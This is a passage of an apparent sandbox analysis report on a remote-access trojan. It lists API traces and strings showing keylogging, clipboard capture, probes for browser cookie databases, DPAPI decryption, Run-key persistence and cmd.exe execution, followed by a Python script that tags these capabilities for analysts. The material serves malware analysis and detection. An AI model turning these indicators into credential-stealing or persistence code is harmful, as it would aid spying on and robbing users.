                                                                                                  • String ID: [regsplt]
                                                                                                  • API String ID: 3554306468-4262303796
                                                                                                  • Opcode ID: 6209f9adf3ebd54435f0d7a716eb47a0d81ae306c6dd88b89f6c65b2c0b42e3c
                                                                                                  • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                                                                                  • Opcode Fuzzy Hash: 6209f9adf3ebd54435f0d7a716eb47a0d81ae306c6dd88b89f6c65b2c0b42e3c
                                                                                                  • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                  • String ID: /sort "Visit Time" /stext "$@NG
                                                                                                  • API String ID: 368326130-3944316004
                                                                                                  • Opcode ID: 115d3ed6b1741adb512821b11b245dc659c1e2162bd541144790ef051353569d
                                                                                                  • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                                                                                  • Opcode Fuzzy Hash: 115d3ed6b1741adb512821b11b245dc659c1e2162bd541144790ef051353569d
                                                                                                  • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                                                                                  APIs
                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$ mG
                                                                                                  • API String ID: 1881088180-2322839566
                                                                                                  • Opcode ID: 811cdfe000e459d503bb944029386f8ceaa377eb4ffdcb54278a65b681284296
                                                                                                  • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                                                                                  • Opcode Fuzzy Hash: 811cdfe000e459d503bb944029386f8ceaa377eb4ffdcb54278a65b681284296
                                                                                                  • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
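The function blocks in this section are the part of the report a reverser reads to attribute capabilities: the USER32 window-title calls, the ADVAPI32 registry enumeration paired with the "[regsplt]" separator, the "[Text copied to clipboard]" / "[End of clipboard]" clipboard log markers, and the PathFileExistsW probes for Chrome's "User Data\...\Network\Cookies" files. The following Python is an added example, not part of Joe Sandbox or of the sample: it parses these plain-text blocks (APIs, Strings and Similarity sections) and tags each function with a behaviour label. The sample input is copied from this report's own blocks with hash lines shortened; the rule table and its labels are this example's interpretation, not Joe Sandbox signatures.

```python
"""Tag capabilities from Joe Sandbox 'IDA Plugin' function blocks.
Added example for reading this report; not Joe Sandbox or sample code.
Rule labels are this example's interpretation of the API/string combos."""
import re

# Constructed sample input: four function blocks copied from this report,
# hash lines shortened and dump-source lines dropped for brevity.
SAMPLE = r"""APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
• GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
• IsWindowVisible.USER32(?), ref: 00417677
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: (VG
• Opcode ID: 7e572b315b2ecefe
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
Similarity
• String ID: [regsplt]
• Opcode ID: 6209f9adf3ebd544
APIs
  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
• __Init_thread_footer.LIBCMT ref: 0040B7D2
Similarity
• String ID: [End of clipboard]$[Text copied to clipboard]$ mG
• Opcode ID: 811cdfe000e459d5
APIs
  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
• PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
Strings
• User Data\Default\Network\Cookies, xrefs: 0040C63E
• User Data\Profile ?\Network\Cookies, xrefs: 0040C670
Similarity
• String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• Opcode ID: 8e16928b384ae0ce
"""

API_RE = re.compile(r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?([A-Za-z_]\w*)\.[A-Z0-9]+\b")
XREF_RE = re.compile(r"•\s*(.*?), xrefs: [0-9A-F]+$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
           "Yara matches", "Similarity"}


def parse_blocks(text):
    """Split report text into per-function dicts of APIs, strings and opcode id."""
    blocks, cur, section = [], None, None
    for line in (l.strip() for l in text.splitlines()):
        if line in HEADERS:                       # unbulleted lines are section headers
            section = line
            if line == "APIs":                    # every function block starts with APIs
                cur = {"apis": [], "strings": [], "opcode_id": None}
                blocks.append(cur)
        elif cur is None or not line:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            cur["apis"].append(m.group(1))        # subcall APIs are counted as well
        elif section == "Strings" and (m := XREF_RE.match(line)):
            cur["strings"].append(m.group(1))
        elif section == "Similarity" and line.startswith("• String ID:"):
            for s in line.split(":", 1)[1].split("$"):   # '$' joins the strings
                if s.strip() and s.strip() not in cur["strings"]:
                    cur["strings"].append(s.strip())
        elif section == "Similarity" and line.startswith("• Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
    return blocks


# (label, APIs that must all appear, string markers of which at least one must appear)
RULES = [
    ("window title / foreground app logging",
     {"GetWindowTextW", "IsWindowVisible", "GetWindowThreadProcessId"}, ()),
    ("registry key and value enumeration", {"RegEnumKeyExW", "RegEnumValueW"}, ()),
    ("clipboard capture (Remcos log markers)", set(),
     ("[Text copied to clipboard]", "[End of clipboard]")),
    ("Chrome cookie database lookup", {"PathFileExistsW"}, (r"Network\Cookies",)),
    ("browser history dump via NirSoft-style CLI", set(), ('/stext "',)),
    ("file write to disk", {"CreateFileW", "WriteFile"}, ()),
]


def tag_capabilities(block):
    """Return the labels whose required APIs and string markers both match."""
    apis = set(block["apis"])
    return [label for label, need, markers in RULES
            if need <= apis
            and (not markers or any(m in s for s in block["strings"] for m in markers))]


def analyse(text):
    """(opcode_id, [capabilities]) for each function block, in report order."""
    return [(b["opcode_id"], tag_capabilities(b)) for b in parse_blocks(text)]


if __name__ == "__main__":
    for opcode_id, caps in analyse(SAMPLE):
        print(opcode_id, "->", ", ".join(caps) or "(no rule matched)")
```

Because the rules key on the combination of API set and referenced strings rather than on either alone, a plain CRT helper that happens to call _free or GetLastError is left untagged, while the clipboard function, whose only APIs are CRT initialisation stubs, is still caught by its log-marker strings. Extend RULES with the report's other markers (for example the C2 port-scanning or keyboard-hook imports listed in the signature summary) to turn the whole IDA section into a capability matrix.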
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                                  Strings
                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                  • Opcode ID: 8e16928b384ae0ce72e815ae57c22294848a02c61a8a71f4ba9d785bccdf6d95
                                                                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                  • Opcode Fuzzy Hash: 8e16928b384ae0ce72e815ae57c22294848a02c61a8a71f4ba9d785bccdf6d95
                                                                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                                  Strings
                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                  • Opcode ID: 3001d16f89ba5f9bfed8131fc8dfd9e41104078c7e185fc4d6da829b92f4ee01
                                                                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                  • Opcode Fuzzy Hash: 3001d16f89ba5f9bfed8131fc8dfd9e41104078c7e185fc4d6da829b92f4ee01
                                                                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,00475100,00000000,00000000), ref: 0040A239
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,00475100,00000000,00000000), ref: 0040A249
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,00475100,00000000,00000000), ref: 0040A255
                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                                  • String ID: Offline Keylogger Started
                                                                                                  • API String ID: 465354869-4114347211
                                                                                                  • Opcode ID: aa941b6b780eb50f2f111ff82fee1c60cdd0ed452bf655484a5542b8935c980e
                                                                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                  • Opcode Fuzzy Hash: aa941b6b780eb50f2f111ff82fee1c60cdd0ed452bf655484a5542b8935c980e
                                                                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                                  • String ID: Online Keylogger Started
                                                                                                  • API String ID: 112202259-1258561607
                                                                                                  • Opcode ID: 1642843c4aeb719f804d1b1faf349d7b90b73fbf07dec7ef3d168b84b43abf66
                                                                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                  • Opcode Fuzzy Hash: 1642843c4aeb719f804d1b1faf349d7b90b73fbf07dec7ef3d168b84b43abf66
                                                                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                                                                  Strings
                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                  • Opcode ID: 265870ca6a49f1cfdf3a79916e036cd98acee69504672a74e3c9871262499b03
                                                                                                  • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                                                                                  • Opcode Fuzzy Hash: 265870ca6a49f1cfdf3a79916e036cd98acee69504672a74e3c9871262499b03
                                                                                                  • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                                  • API String ID: 2574300362-2380590389
                                                                                                  • Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                  • Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
                                                                                                  • Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                  • Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                  • String ID: Connection Timeout
                                                                                                  • API String ID: 2055531096-499159329
                                                                                                  • Opcode ID: f68205fbbd132f7411d12c93b7f65b2f09768eee2fc5ae5d8c71895408bf9877
                                                                                                  • Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
                                                                                                  • Opcode Fuzzy Hash: f68205fbbd132f7411d12c93b7f65b2f09768eee2fc5ae5d8c71895408bf9877
                                                                                                  • Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                                                                                  APIs
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 2005118841-1866435925
                                                                                                  • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                  • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                  APIs
                                                                                                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752E8,74DF37E0,?), ref: 00413888
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752E8,74DF37E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValue
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                  • API String ID: 1818849710-1051519024
                                                                                                  • Opcode ID: 4130c156bc7d53422bd274e0503f6f5712380358a0a777b589ce21756e596352
                                                                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                  • Opcode Fuzzy Hash: 4130c156bc7d53422bd274e0503f6f5712380358a0a777b589ce21756e596352
                                                                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 3628047217-1405518554
                                                                                                  • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                  • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                  APIs
                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                  • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000), ref: 004137E1
                                                                                                  • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EF0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValue
                                                                                                  • String ID: Control Panel\Desktop
                                                                                                  • API String ID: 1818849710-27424756
                                                                                                  • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                  • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                  • String ID: !D@
                                                                                                  • API String ID: 3446828153-604454484
                                                                                                  • Opcode ID: 299c7e2eac24c2f7a13a1ef740d02627241d5152881cd92f93c311e1267b1ee5
                                                                                                  • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                                                                                  • Opcode Fuzzy Hash: 299c7e2eac24c2f7a13a1ef740d02627241d5152881cd92f93c311e1267b1ee5
                                                                                                  • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                                                                                  APIs
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteShell
                                                                                                  • String ID: /C $cmd.exe$open
                                                                                                  • API String ID: 587946157-3896048727
                                                                                                  • Opcode ID: ba5b8ac7040460dc6065eceb26c8d4705fa8e3e7fffb1ef49e463b9dc02157a1
                                                                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                  • Opcode Fuzzy Hash: ba5b8ac7040460dc6065eceb26c8d4705fa8e3e7fffb1ef49e463b9dc02157a1
                                                                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                  • Opcode ID: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                  • Instruction ID: dd969ba971dbaa29921178884ad428293cf5128bfb63f122c38d39e9abecacc1
                                                                                                  • Opcode Fuzzy Hash: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                  • Instruction Fuzzy Hash: 3EB09B74541740FB8F102B745D4D5153525A604703B100475F041D6151D7B584009A1E
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                  • Opcode ID: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                  • Instruction ID: c0691e7ba4e037ba5be4177d0f13c81de84985c40ff74287bb3597843e96be7a
                                                                                                  • Opcode Fuzzy Hash: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
